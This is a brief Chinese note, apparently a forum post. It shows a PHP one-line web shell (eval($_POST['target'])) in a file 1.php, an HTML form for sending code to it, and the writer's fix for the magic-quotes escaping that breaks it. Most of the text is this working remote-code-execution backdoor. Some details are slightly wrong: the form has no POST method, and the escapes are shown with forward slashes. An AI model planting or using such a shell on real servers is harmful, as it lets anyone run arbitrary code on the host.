服务端,1.php文件中有
<?eval($_POST['target'])?>
客户端文件
<form action="1.php">
<textarea name=target>echo 'ddd';</textarea>
</form>
在提交的时候,并不是提交的
echo ‘ddd’;
而是提交的
echo /'ddd/';
于是会报错, 我靠, 这也可以啊
提示解决方案!
addslashes()/stripslashes()/get_magic_quotes_gpc()
三个函数
